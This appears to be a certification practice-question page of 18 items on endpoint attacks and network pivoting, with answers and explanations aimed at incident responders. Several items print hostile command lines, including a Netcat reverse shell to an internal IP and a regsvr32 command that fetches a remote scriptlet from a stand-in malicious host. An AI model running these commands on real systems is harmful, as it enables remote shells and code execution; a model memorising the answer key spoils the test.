Courseiva

CCNA Endpoint Attack And Pivoting Questions

18 questions · Endpoint Attack And Pivoting topic · All types, answers revealed

1
MCQhard

An attacker has compromised a Linux host and is pivoting using a SOCKS proxy. Which tool is most commonly utilized for this purpose in a cross-platform environment?

A.Netcat
B.Chisel
C.Tcpdump
D.Wget
AnswerB

Chisel is highly effective for creating SOCKS proxies because it encapsulates traffic within HTTP/HTTPS, often bypassing basic firewall egress rules. Because it uses a client-server model, it allows attackers to easily tunnel arbitrary traffic through a compromised node, making it a critical tool to monitor.

Why this answer

Chisel is a fast, TCP/UDP tunnel over HTTP, secured via SSH, that is widely used for creating SOCKS proxies. Its ease of use and ability to bypass firewalls make it a favorite for attackers. Incident responders must understand how to detect Chisel traffic, which often mimics standard HTTPS traffic, by inspecting packet sizes and connection duration patterns.

Exam trap

Candidates often guess common tools like Netcat or Metasploit, failing to recognize Chisel's specific popularity for creating SOCKS proxies over HTTP/HTTPS to bypass restrictive firewall egress rules.

2
MCQmedium

Why are 'Pass-the-Hash' (PtH) attacks effective for pivoting in a Windows environment?

A.Because they force a password reset on the target.
B.Because NTLM authentication does not require the password itself.
C.Because they only work on Linux-based domain controllers.
D.Because the hash is always encrypted with AES-256.
AnswerB

The NTLM authentication protocol is designed to verify identity using a challenge-response mechanism based on the user's hash. As long as the attacker has the valid hash, they can participate in the challenge-response process just like the legitimate user, gaining unauthorized access to the network resources.

Why this answer

PtH attacks leverage the NTLM hash directly to authenticate, bypassing the need for the plaintext password. Because Windows stores these hashes in LSASS for single-sign-on capabilities, an attacker who gains administrative rights can extract them and reuse them to access other systems in the domain. This is a fundamental risk in environments where users have local admin rights on their workstations.

Exam trap

Candidates often assume that Pass-the-Hash attacks require cracking the NTLM hash to recover the original plaintext user password, confusing PtH with credential cracking methods like brute-forcing.

3
MCQmedium

During an investigation, you discover that an attacker used the Windows utility 'schtasks' to create a scheduled task on a compromised endpoint. The task is configured to run a malicious executable every time a user logs on. Which of the following best describes the attacker's primary goal with this action?

A.To escalate privileges by running the executable as SYSTEM.
B.To exfiltrate data to an external command and control server.
C.To disable antivirus software on the endpoint.
D.To maintain persistence on the compromised host.
AnswerD

Scheduled tasks are a common persistence mechanism. By configuring a task to run at logon, the attacker ensures the malicious executable executes automatically after a reboot or user session. This allows the attacker to maintain access without needing to re-exploit the system.

Why this answer

Creating a scheduled task that runs at user logon is a classic persistence technique. It ensures the attacker's payload executes automatically after a reboot or when a user logs in, allowing the attacker to maintain a foothold. While the executable could perform other actions, the primary goal of the scheduled task is to establish persistence.

Exam trap

The trap here is assuming that any scheduled task is for privilege escalation, when the logon trigger specifically points to persistence.

4
MCQhard

Which of the following describes the 'SMB Relay' attack during lateral movement?

A.Encrypting files on the network share.
B.Intercepting authentication and relaying it to another machine.
C.Sending flood packets to crash the SMB service.
D.Replacing the SMB.exe binary with a malicious version.
AnswerB

This accurately describes the mechanism of an SMB Relay attack. By positioning themselves as a man-in-the-middle, the attacker captures the authentication handshake and forwards it to a destination server. This allows the attacker to authenticate as the victim, effectively pivoting to a new host without cracking passwords.

Why this answer

SMB Relay works by intercepting a client's authentication request (SMB) and forwarding it to another target machine. If the client has sufficient privileges, the attacker gains access to the target without ever needing the user's password. This attack is particularly dangerous in environments without SMB signing enabled, as it allows for easy lateral movement through man-in-the-middle positioning within the local network segment.

Exam trap

Candidates frequently mistake SMB Relay for a credential-cracking attack. They assume the attacker is trying to decrypt the intercepted hash rather than immediately using it to authenticate to another machine.

5
MCQmedium

An attacker has compromised a Windows host and established a reverse shell using a malicious DLL loaded by a legitimate signed executable via DLL search order hijacking. The incident responder wants to identify the specific DLL that was hijacked and the process that loaded it. Which of the following data sources would provide the MOST direct evidence of the DLL load event and the loading process?

A.Sysmon Event ID 7 (Image loaded)
B.Windows Security event ID 4688 with command line auditing
C.Windows Defender Application Control (WDAC) event logs
D.Sysmon Event ID 1 (Process creation)
AnswerA

Sysmon Event ID 7 logs when a module (DLL) is loaded into a process, including the Image (process) and ImageLoaded (DLL path), along with hashes and signature information. This directly shows which process loaded the malicious DLL and the DLL's location, enabling the responder to identify the hijacked DLL and the legitimate executable involved. It is the most direct evidence source for DLL load events.

Why this answer

Sysmon Event ID 7 specifically captures module load events, including the loading process image and the loaded DLL path, along with hashes. This makes it the most direct source to identify the hijacked DLL and the process that loaded it. Other sources either lack DLL load detail or are not guaranteed to log the event.

Exam trap

The trap here is confusing process creation events with DLL load events; only dedicated module load telemetry like Sysmon Event ID 7 directly shows which DLL was loaded into which process.

6
MCQmedium

An incident responder investigating a compromised Windows workstation discovers that an attacker established persistent command and control using a malicious DLL. The DLL was placed in a system directory and loaded by a legitimate, signed Microsoft binary through DLL search order hijacking. Which response action effectively remediates the persistence while preserving the legitimate binary and minimizing host downtime?

A.Reimage the compromised workstation immediately to ensure all hidden artifacts and registry hooks are completely removed from the operating system.
B.Delete the legitimate signed Microsoft binary that loaded the malicious payload to prevent any further execution attempts by the operating system.
C.Locate and securely delete the rogue malicious DLL file from the search path while preserving the legitimate signed binary and auditing registry permissions.
D.Modify the Windows Registry to disable the DLL loading subsystem entirely across the domain to prevent all future instances of search order hijacking.
AnswerC

Targeting the specific malicious DLL file neutralizes the persistence mechanism while preserving system stability and legitimate application functionality. Auditing directory and registry permissions ensures the attacker cannot easily drop another replacement payload into the vulnerable path.

Why this answer

Identifying and removing the malicious payload while keeping the legitimate application intact is critical for operational continuity during incident response. DLL search order hijacking exploits how Windows searches for dependent libraries. Replacing or removing the unauthorized payload neutralizes the execution vector without requiring a full OS reinstallation, allowing investigators to focus on lateral movement and containment.

Exam trap

Candidates often select full system re-imagining or terminating the parent process, overlooking targeted remediation steps that preserve business-critical software configurations and reduce organizational downtime during active investigations.

7
MCQeasy

A security analyst is reviewing logs from a compromised Linux server and notices that an attacker has created a reverse shell using Netcat. The command executed was: nc -e /bin/bash 192.168.1.100 4444. Which of the following best describes the attacker's objective?

A.To scan the remote host for open ports.
B.To establish an interactive command shell on the compromised server.
C.To download additional tools from the remote host.
D.To exfiltrate sensitive files from the server to the remote host.
AnswerB

The command uses Netcat's -e option to execute /bin/bash and redirect its input/output to the remote IP and port. This creates a reverse shell, giving the attacker interactive command-line access to the server. The remote host listens on port 4444 to receive the connection.

Why this answer

Netcat with the -e option executes a specified program and binds its standard input/output to the network connection. When combined with /bin/bash and a remote IP/port, it creates a reverse shell that connects back to the attacker, providing interactive command execution. This is a classic post-exploitation technique for maintaining access and pivoting.

Exam trap

The trap here is assuming that any Netcat usage is for file transfer or scanning, when the -e flag specifically indicates shell execution.

8
MCQeasy

An attacker has gained access to a Linux server and wants to use it as a pivot point to scan the internal network. The attacker executes `ssh -D 1080 user@compromised-server` from their machine. Which of the following best describes the capability this provides to the attacker?

A.A reverse shell from the compromised server back to the attacker
B.A SOCKS proxy that allows the attacker to route TCP traffic through the compromised server
C.An encrypted file transfer channel for exfiltrating data
D.A VPN tunnel that assigns the attacker an IP address on the internal network
AnswerB

The `ssh -D` option creates a dynamic port forwarding tunnel, which sets up a SOCKS proxy on the local machine (here, port 1080). The attacker can then configure tools like proxychains or a web browser to use this SOCKS proxy, causing their traffic to be sent through the SSH tunnel and out from the compromised server. This enables pivoting into the internal network from the compromised host's perspective.

Why this answer

The `ssh -D` command establishes a dynamic port forwarding tunnel that acts as a SOCKS proxy. The attacker can then direct tools through this proxy to scan or access internal hosts as if originating from the compromised server. It does not provide a reverse shell, file transfer, or VPN functionality; those require different SSH options or tools.

Exam trap

The trap here is confusing dynamic port forwarding with other SSH tunneling features like remote port forwarding or VPNs, which have different flags and capabilities.

9
MCQmedium

An incident responder is examining a compromised Windows 10 workstation that an attacker used to pivot into the internal network. The responder runs `netstat -ano` and sees an established connection from the workstation to an internal server on TCP port 445, but no user has mapped a drive or accessed a share. Which of the following Windows artifacts would BEST reveal the remote service or process that initiated this SMB connection?

A.Windows Security event ID 4624 with logon type 3
B.Security event ID 5140 (network share object was accessed)
C.Sysmon Event ID 3 (network connection detected)
D.Prefetch file for the executable that made the connection
AnswerC

Sysmon Event ID 3 logs network connections with the source and destination IP addresses, ports, and the Image (process) that initiated the connection. On the compromised workstation, this event would directly tie the SMB connection to a specific executable or service, such as a malicious binary or a living-off-the-land tool. This is the most direct artifact to identify the remote service or process that created the connection.

Why this answer

Sysmon Event ID 3 captures network connection events with the initiating process image, source and destination IPs, and ports. On the compromised workstation, this event directly links the SMB connection to a specific executable or service, which is exactly what the responder needs. Other artifacts either reside on the remote server, lack process context, or do not record network activity.

Exam trap

The trap here is assuming that Windows Security event logs alone will identify the process behind a network connection, when in fact process-level network attribution requires Sysmon or similar telemetry.

10
MCQmedium

During an investigation of a compromised Windows 10 workstation, you observe the following command executed by a user process: `regsvr32.exe /s /u /i:https://malicious.example/payload.sct scrobj.dll`. The user has no legitimate reason to run regsvr32. Which attack technique is this command most indicative of?

A.COM hijacking via registry modification
B.DLL hijacking through a malicious scrobj.dll
C.AppLocker bypass via msbuild.exe
D.Squiblydoo
AnswerD

This command uses regsvr32.exe to load a remote scriptlet (.sct) via the /i: URL parameter, bypassing application whitelisting and executing arbitrary code. This is the classic Squiblydoo technique, which abuses the trusted regsvr32 binary to download and execute a scriptlet, often for initial access or lateral movement.

Why this answer

The command uses regsvr32.exe with the /i: parameter to load a remote scriptlet from a URL, a technique known as Squiblydoo. This bypasses application whitelisting because regsvr32 is a trusted, signed binary. The attacker leverages this to execute code without writing a persistent executable to disk, making detection challenging.

Exam trap

The trap here is assuming any regsvr32 usage is benign COM registration, when the /i: URL and .sct extension clearly indicate remote scriptlet execution.

11
Multi-Selecthard

An incident handler is analyzing a Windows endpoint where an adversary successfully executed a living-off-the-land binary (LotLB) to establish an unauthorized tunnel and pivot deeper into the internal network. Which TWO forensic artifacts should the analyst examine to reconstruct the command-line arguments and parent-child process creation chain associated with this execution? (Choose TWO)

Select 2 answers
A.Windows Security Event Log ID 4688 with advanced command-line auditing enabled
B.Windows System Event Log ID 7045 tracking installed services
C.Volatile memory dumps analyzed with volatility plugins such as pslist, pstree, and cmdline
D.Dynamic Host Configuration Protocol (DHCP) operational logs
E.Internet Information Services (IIS) W3C web server access logs
AnswersA, C

Event ID 4688 records process creation details, including user context and exact command-line arguments, provided the appropriate Group Policy setting is active. This makes it a primary source for identifying living-off-the-land binaries and their execution parameters.

Why this answer

Reconstructing process execution lineages requires capturing volatile process trees and detailed argument strings. Windows Security Event Log ID 4688, when command-line auditing is enabled, records the exact parameters passed to binaries. Additionally, memory analysis tools inspect unswapped physical RAM to recover remnants of terminated process execution blocks, making these two sources vital for handling advanced adversary tradecraft.

Exam trap

Candidates frequently select the Windows Firewall logs or Application event logs, forgetting that process lineage and command-line execution parameters are strictly managed by the kernel process creation APIs and security auditing subsystems.

12
MCQmedium

During an investigation, you observe an attacker using 'PsExec' to move laterally. What is the primary artifact created by PsExec that can be used to track its execution across the network?

A.The creation of a temporary file named 'psexec.exe' in the root directory.
B.The installation of a service named 'PSEXESVC'.
C.An entry in the 'Run' registry key for persistence.
D.A specific user-mode process named 'psexec_agent'.
AnswerB

PsExec operates by deploying a service named 'PSEXESVC' to the remote machine. Monitoring for the registration and execution of this service is a standard and highly effective detection technique for responders. It is the core mechanism PsExec uses to achieve remote code execution as a system user.

Why this answer

PsExec functions by creating a remote service named 'PSEXESVC' on the target machine. This service executes the payload and is then cleaned up. Identifying the creation and deletion of this specific service name in the Windows System event logs (Event ID 7045) is the most reliable way to track PsExec activity, provided that the logs have not been cleared by the attacker.

Exam trap

Candidates often look for process execution logs or file creation, missing the specific service installation artifact that is the hallmark of PsExec's remote execution mechanism.

13
MCQmedium

During an incident response on a Windows 10 endpoint, you observe that a malicious process has injected a thread into a remote process on the same host using the CreateRemoteThread API. The injected code is now executing in the context of a legitimate system process. Which of the following best describes the primary purpose of this technique from the attacker's perspective?

A.To harvest credentials from the LSASS process memory.
B.To evade detection by masquerading malicious code within a trusted process.
C.To establish a covert channel over DNS for command and control.
D.To escalate privileges by exploiting a vulnerable driver in the kernel.
AnswerB

CreateRemoteThread injection allows an attacker to run code inside a legitimate process, such as explorer.exe or svchost.exe. Security tools often trust these processes, so the malicious activity may blend in with normal behavior. This provides stealth and persistence, making it the primary purpose in the given scenario.

Why this answer

Injecting a thread into a remote process using CreateRemoteThread enables an adversary to execute arbitrary code within the address space of a trusted process. This helps evade detection because many security solutions allowlist or trust system processes. The technique does not inherently escalate privileges, create network tunnels, or dump credentials, making the evasion-focused description the correct one.

Exam trap

The trap here is assuming that any process injection automatically leads to privilege escalation, when in fact the primary goal is often stealth and defense evasion.

14
MCQmedium

Refer to the exhibit. An attacker attempts to establish persistence by creating a new service. Why did the command fail?

A.The service has already been deleted by the system.
B.The 'sc' command does not support the 'binPath' argument.
C.The command syntax is incorrect for creating a service.
D.The user lacks sufficient privileges to query services.
AnswerC

The 'sc query' command is designed to retrieve the status of a registered service, not to define a new one. To register a service, the attacker must use 'sc create [ServiceName] binPath=...'. The provided command failed because it was querying for an object that was never defined.

Why this answer

The 'sc query' command is used to inspect existing services, not to register new ones. The attacker attempted to use the query syntax rather than the 'create' command to define the service. Understanding the proper syntax for service manipulation is critical for incident handlers to identify how attackers attempt to achieve persistence via Windows Service Control Manager or other system-level configuration methods.

Exam trap

Candidates often confuse the 'sc query' command with 'sc create'. They assume that because 'query' is used to view services, it is the primary command for all service-related administrative tasks in Windows.

15
MCQmedium

What is the primary function of the 'Token Manipulation' technique in Windows pivoting?

A.To hide files in a hidden directory.
B.To bypass user authentication prompts.
C.To impersonate another user's security context.
D.To encrypt the memory of a running process.
AnswerC

Impersonation is the core goal of token manipulation. By taking the security token of a higher-privileged process, the attacker can execute commands with those elevated permissions. This is a common and powerful technique used during lateral movement to gain control over critical system components and administrative resources.

Why this answer

Token manipulation involves stealing an access token from a process running as a different user (e.g., SYSTEM or an Administrator) and using it to spawn a new process. This allows the attacker to elevate their privileges or move laterally as a different user. Understanding this technique is vital for incident handlers because it explains how attackers maintain high-level access without knowing user passwords.

Exam trap

Candidates confuse token manipulation with password dumping. They assume the attacker must crack a password to impersonate a user, rather than realizing the token already exists in memory for legitimate use.

16
MCQhard

A compromised Windows 10 workstation has an active Meterpreter session. The responder observes that the attacker used the `portfwd` command to redirect traffic from the victim's TCP port 8080 to an internal HR server's TCP port 3389. The internal HR server is not directly reachable from the responder's analysis host. Which mechanism is the attacker leveraging to pivot into the HR server?

A.A reverse TCP shell bound to the HR server's port 3389.
B.An SSH tunnel using the compromised workstation as a jump host.
C.A TCP relay created by the Meterpreter `portfwd` command.
D.A SOCKS proxy established via the Meterpreter `socks` command.
AnswerC

The `portfwd` command in Meterpreter creates a TCP relay that listens on a specified port on the compromised host and forwards all incoming connections to a target IP and port. Here, it listens on TCP 8080 on the victim and relays to the HR server's TCP 3389, effectively pivoting into the internal network segment.

Why this answer

The `portfwd` command in Meterpreter creates a TCP relay on the compromised host, forwarding traffic from a local port to a specified remote address and port. This allows the attacker to reach internal services that are not directly accessible from their own machine, effectively using the victim as a pivot point. The other options describe different pivoting techniques that do not match the observed command.

Exam trap

The trap here is confusing port forwarding with a reverse shell or SOCKS proxy, which serve different purposes and require different configurations.

17
Multi-Selecthard

An incident responder is investigating a Windows endpoint where an attacker used the Windows Management Instrumentation (WMI) event subscription mechanism to establish persistence. The responder wants to identify the specific WMI components created by the attacker. Which two of the following WMI artifacts should the responder examine to find the malicious event subscription? (Choose two.)

Select 2 answers
A.__EventFilter instances in the root\subscription namespace
B.__EventConsumer instances in the root\subscription namespace
C.Win32_Service instances in the root\cimv2 namespace
D.MSFT_ScheduledTask instances in the root\Microsoft\Windows\TaskScheduler namespace
E.Win32_StartupCommand instances in the root\cimv2 namespace
AnswersA, B

__EventFilter instances define the events that trigger a WMI event subscription. In a malicious persistence setup, the attacker creates an event filter to specify a trigger, such as a system uptime or user logon. Examining the root\subscription namespace for __EventFilter instances will reveal the filter name, query, and other details, which can be used to identify the malicious subscription and its trigger condition.

Why this answer

WMI event subscription persistence consists of three components: __EventFilter, __EventConsumer, and __FilterToConsumerBinding. The filter defines the trigger, and the consumer defines the action. Examining __EventFilter and __EventConsumer instances in the root\subscription namespace will reveal the malicious subscription's details, including the trigger query and the payload executed.

The other options represent different persistence mechanisms.

Exam trap

The trap here is assuming that any WMI class related to system configuration will reveal the subscription, when in fact only the __EventFilter, __EventConsumer, and binding classes in the root\subscription namespace are relevant.

18
MCQmedium

An attacker is using WMI (Windows Management Instrumentation) to move laterally. Which WMI class and method combination is frequently abused for remote process execution?

A.Win32_Service, StartService
B.Win32_Process, Create
C.Win32_StartupCommand, Create
D.Win32_ScheduledJob, Create
AnswerB

The Win32_Process Create method is a standard technique used by attackers to execute commands on remote systems via WMI. It is favored because it does not require a persistent installation, allowing for stealthy lateral movement that is easily integrated into automated post-exploitation scripts and tools.

Why this answer

The Win32_Process class, specifically the Create method, allows for the execution of arbitrary commands on remote systems. Incident responders often look for WMI-based process creation events in logs to detect lateral movement. Because WMI is a legitimate administrative tool, distinguishing between normal management traffic and malicious movement is a key challenge for detection and response teams.

Exam trap

Candidates often guess generic WMI classes like 'Win32_Service' because they associate WMI with persistence. They overlook that 'Win32_Process' is the specific class required for direct, remote command execution.

Ready to test yourself?

Try a timed practice session using only Endpoint Attack And Pivoting questions.